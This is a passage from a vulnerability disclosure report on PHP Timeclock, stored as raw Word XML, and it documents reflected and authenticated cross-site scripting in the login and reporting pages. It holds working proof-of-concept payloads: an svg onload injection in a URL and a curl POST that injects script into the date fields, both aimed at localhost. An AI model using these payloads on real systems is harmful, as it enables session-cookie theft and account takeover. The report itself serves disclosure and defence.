      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>/reports/timerpt.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28594A60" w14:textId="679D3D91" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00DE045F"/>
    <w:p w14:paraId="164FC589" w14:textId="5F9D3B14" w:rsidR="00126D2B" w:rsidRDefault="00126D2B" w:rsidP="00126D2B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00126D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00490BD6">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00490BD6" w:rsidRPr="00490BD6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">HIGH] </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers can exploit this vulnerability by sending targeted </w:t>
      </w:r>
      <w:r w:rsidR="00CA4AAC">
        <w:t>phishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> links to school administrators and employees which contain in-URL payloads to steal php session cookies and credentials. These session cookies can then be sent back to an attacker owned </w:t>
      </w:r>
      <w:r w:rsidR="008451CB">
        <w:t>machine and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be used to login and impersonate the user. For example, an attacker can send a </w:t>
      </w:r>
      <w:r w:rsidR="008451CB">
        <w:t>phishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> link to the admin which will exploit the XSS when clicked, sending the session cookie to an attacker owned server. The attacker can then log into the application as the administrator. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713134F9" w14:textId="07CA2D52" w:rsidR="00DE1091" w:rsidRDefault="00DE1091" w:rsidP="00126D2B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723955D0" w14:textId="45AD3E7D" w:rsidR="00DE1091" w:rsidRDefault="00DE1091" w:rsidP="00126D2B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE1091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE6717" w:rsidRPr="00DE6717">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="00CC4459">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidR="00DE6717" w:rsidRPr="00DE6717">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/login.php</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73EA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/'%3E%3Csvg/onload=alert%60xss%60%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C872B7C" w14:textId="089BF17E" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00DE045F"/>
    <w:p w14:paraId="618C2026" w14:textId="4D4E6237" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00DE045F"/>
    <w:p w14:paraId="747E4F8B" w14:textId="642EBAA2" w:rsidR="00CA3D12" w:rsidRPr="00DE045F" w:rsidRDefault="00AB5287" w:rsidP="00DE045F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3754BFBD" wp14:editId="51909D63">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>143510</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>126150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3129280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10" name="Picture 1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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00842157" w:rsidRPr="00DE045F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Image </w:t>
      </w:r>
      <w:r w:rsidR="009929E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00842157" w:rsidRPr="00DE045F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Exploiting a Reflective Cross Site Scripting Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657206EF" w14:textId="5AD623F8" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="08FE2A24" w14:textId="3C3B21CF" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="2D2310BF" w14:textId="15206364" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="644329F0" w14:textId="54B41A93" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="247EA64A" w14:textId="7FBED9FB" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="7DD8C628" w14:textId="0036F62E" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="578EE9BF" w14:textId="20AA3695" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="3CFCAD19" w14:textId="7960BC92" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="679C5FA3" w14:textId="750DE3E7" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="30ED0024" w14:textId="1F46B5BF" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="08B213B4" w14:textId="32AA8E53" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="5422C6E4" w14:textId="5534F045" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="6AF25FEE" w14:textId="3EA9AB6D" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="7B328A86" w14:textId="66802105" w:rsidR="00DE045F" w:rsidRDefault="00DE045F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="671CB588" w14:textId="48C822EA" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="1AFE218E" w14:textId="06B7B0F8" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="23717AE6" w14:textId="16B2B04F" w:rsidR="00CA3D12" w:rsidRDefault="008C0598" w:rsidP="009929E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc71189272"/>
      <w:bookmarkStart w:id="9" w:name="_Toc71209070"/>
      <w:r w:rsidRPr="008C0598">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Multiple </w:t>
      </w:r>
      <w:r w:rsidR="00490BD6">
        <w:t xml:space="preserve">Authenticated </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0598">
        <w:t xml:space="preserve">Cross-Site Scripting </w:t>
      </w:r>
      <w:r>
        <w:t>Vulnerabilities via Post Parameters in Reporting Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1D0B79E4" w14:textId="5C4FE25D" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="008C0598"/>
    <w:p w14:paraId="2099D662" w14:textId="4C9337E4" w:rsidR="008C0598" w:rsidRDefault="00126D2B" w:rsidP="00126D2B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00126D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008C0598">
        <w:t xml:space="preserve">The PHP Timeclock application is vulnerable to multiple cross site scripting vulnerabilities in the reporting functionalities of </w:t>
      </w:r>
      <w:r w:rsidR="008C0598" w:rsidRPr="008C0598">
        <w:t>total_hours.php</w:t>
      </w:r>
      <w:r w:rsidR="008C0598">
        <w:t>, timerpt.php, and audit.php. Each of these resources is vulnerable to payload injection in the from_date, and to_date parameters. The effected components are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0D89C" w14:textId="77777777" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="008C0598"/>
    <w:p w14:paraId="176EA9A9" w14:textId="592C36D6" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="008C0598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0598">
        <w:t>total_hours.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040A742" w14:textId="4C6BC4F6" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="008C0598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>timerpt.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6FEF2D" w14:textId="2A412C6B" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="008C0598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>audit.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F20A7FD" w14:textId="54C9CAD2" w:rsidR="00126D2B" w:rsidRDefault="00126D2B" w:rsidP="00126D2B"/>
    <w:p w14:paraId="5C76B4F3" w14:textId="4988DCFF" w:rsidR="00126D2B" w:rsidRDefault="00126D2B" w:rsidP="00126D2B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E00A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00490BD6" w:rsidRPr="00490BD6">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>[Low]</w:t>
      </w:r>
      <w:r w:rsidR="00490BD6">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00490BD6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The risks of this XSS is low</w:t>
      </w:r>
      <w:r w:rsidR="00B52109">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. To exploit the vulnerability, an attacker needs to be an authenticated administrator. Further reducing exploitability, the XSS is only interpreted when creating a report, and is not stored in the application. </w:t>
      </w:r>
      <w:r w:rsidR="009E00A1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>There is little impact</w:t>
      </w:r>
      <w:r w:rsidR="00BD4FEC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. The PoC in Image 3 uses a local test environment to prove exploitability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC5480" w14:textId="52A2A2D1" w:rsidR="009B58E4" w:rsidRDefault="009B58E4" w:rsidP="00126D2B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424469B9" w14:textId="0AC6B2DA" w:rsidR="00304FB8" w:rsidRDefault="009B58E4" w:rsidP="00304FB8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62101826" w14:textId="77777777" w:rsidR="00304FB8" w:rsidRPr="00304FB8" w:rsidRDefault="00304FB8" w:rsidP="00304FB8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>curl -i -s -k -X $'POST' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B42BF" w14:textId="77777777" w:rsidR="00304FB8" w:rsidRPr="00304FB8" w:rsidRDefault="00304FB8" w:rsidP="00304FB8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H $'Host: localhost' -H $'Content-Length: 242' -H $'Cache-Control: max-age=0' -H $'sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\"' -H $'sec-ch-ua-mobile: ?0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://localhost' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Referer: http://localhost/reports/total_hours.php' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC6429" w14:textId="77777777" w:rsidR="00304FB8" w:rsidRPr="00304FB8" w:rsidRDefault="00304FB8" w:rsidP="00304FB8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -b $'PHPSESSID=deabe86d43dc8a946b4f9a20639bc0ad' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5B83BC" w14:textId="77777777" w:rsidR="00304FB8" w:rsidRPr="00304FB8" w:rsidRDefault="00304FB8" w:rsidP="00304FB8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    --data-binary $'date_format=M%2Fd%2Fyyyy&amp;office_name=foo&amp;group_name=foo+group&amp;user_name=foo&amp;from_date=5%2F6%2F2021\'&gt;&lt;svg/onload=alert`xss`&gt;&amp;to_date=5%2F6%2F2021&amp;csv=0&amp;tmp_paginate=1&amp;tmp_show_details=1&amp;tmp_display_ip=1&amp;tmp_round_time=0&amp;submit.x=23&amp;submit.y=10' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB80CFB" w14:textId="6FDD6D7C" w:rsidR="008C0598" w:rsidRPr="000A6481" w:rsidRDefault="00304FB8" w:rsidP="000A6481">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    $'http://localhost/reports/total_hours.php'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A12389" w14:textId="015A044E" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D30638" w14:textId="67F838F1" w:rsidR="008C0598" w:rsidRDefault="008C0598" w:rsidP="005F54BC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00842157">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Image </w:t>
      </w:r>
      <w:r w:rsidR="00FB3FA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00842157">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: Exploiting a Cross Site Scripting </w:t>
      </w:r>
      <w:r w:rsidR="00F771B2" w:rsidRPr="00842157">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerably</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in Reporting Post Parameters</w:t>
      </w:r>
      <w:r w:rsidR="00126D2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DF51BDC" wp14:editId="414428A5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>163830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>132065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3474720"/>
            <wp:effectExtent l="0" t="0" r="0" b="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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="738986F2" w14:textId="7E0AEAB2" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DAA761" w14:textId="7653D953" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C541FD" w14:textId="6F812BB3" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497652FC" w14:textId="5B5A692F" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36820F89" w14:textId="369ABDFB" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69771D66" w14:textId="19AFBC61" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DAA56A" w14:textId="2DD39FE7" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AAA3DE8" w14:textId="6015B0B7" w:rsidR="00086FD9" w:rsidRDefault="00086FD9" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B29489A" w14:textId="77777777" w:rsidR="00086FD9" w:rsidRDefault="00086FD9" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5B340E" w14:textId="77777777" w:rsidR="00126D2B" w:rsidRDefault="00126D2B" w:rsidP="00126D2B"/>
    <w:p w14:paraId="787EEB4E" w14:textId="77777777" w:rsidR="00126D2B" w:rsidRDefault="00126D2B" w:rsidP="00126D2B"/>
    <w:p w14:paraId="3EB89167" w14:textId="77777777" w:rsidR="00126D2B" w:rsidRDefault="00126D2B" w:rsidP="00126D2B"/>
    <w:p w14:paraId="6432CF22" w14:textId="77777777" w:rsidR="00F14289" w:rsidRDefault="00F14289" w:rsidP="00F14289">
      <w:bookmarkStart w:id="10" w:name="_Toc71189273"/>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p w14:paraId="53089984" w14:textId="14D4DBD3" w:rsidR="00C51F53" w:rsidRPr="00F55B3C" w:rsidRDefault="00153C1A" w:rsidP="008C0598">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00153C1A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A9F4B" w14:textId="5EDE32AC" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc71189275"/>
      <w:bookmarkStart w:id="12" w:name="_Toc71209073"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Contact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4ADBDC" w14:textId="0BE14591" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53"/>
    <w:p w14:paraId="5C367975" w14:textId="1D89FDD1" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53">
      <w:r>
        <w:t>If there are any questions about the report or its findings, please feel free to reach out to me at any of the below methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAFEBC" w14:textId="596B5AE5" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53"/>
    <w:p w14:paraId="068AF2EA" w14:textId="1B95A7D1" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53"/>
    <w:p w14:paraId="5753C83A" w14:textId="46BB73AD" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53">
      <w:r w:rsidRPr="00D83EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BA16AB">
        <w:t>tcbutler320@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B05766C" w14:textId="233DA632" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53">
      <w:r w:rsidRPr="00D83EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Twitter:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tbutler0x90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D8005" w14:textId="55B60269" w:rsidR="00394A61" w:rsidRDefault="00394A61" w:rsidP="00C51F53">
      <w:r w:rsidRPr="00D83EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Website:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://tbutler.</w:t>
      </w:r>
      <w:r w:rsidR="00BE3F64">
        <w:t>org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F7F12" w14:textId="473AB419" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53"/>
    <w:p w14:paraId="321C05C4" w14:textId="7815EC25" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53"/>
    <w:p w14:paraId="7C112D44" w14:textId="3A028436" w:rsidR="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53"/>
    <w:p w14:paraId="0D96E4DC" w14:textId="77777777" w:rsidR="00C51F53" w:rsidRPr="00C51F53" w:rsidRDefault="00C51F53" w:rsidP="00C51F53"/>
    <w:sectPr w:rsidR="00C51F53" w:rsidRPr="00C51F53" w:rsidSect="00EE6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12C5" w14:textId="77777777" w:rsidR="00DD5500" w:rsidRDefault="00DD5500" w:rsidP="00CA3D12">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="007518DF" w14:textId="77777777" w:rsidR="00DD5500" w:rsidRDefault="00DD5500" w:rsidP="00CA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249BE" w14:textId="77777777" w:rsidR="00DD5500" w:rsidRDefault="00DD5500" w:rsidP="00CA3D12">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4D23E490" w14:textId="77777777" w:rsidR="00DD5500" w:rsidRDefault="00DD5500" w:rsidP="00CA3D12">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w14:paraId="2F4BF902" w14:textId="2C8B6AB2" w:rsidR="004214EA" w:rsidRDefault="004214EA">
      <w:pPr>
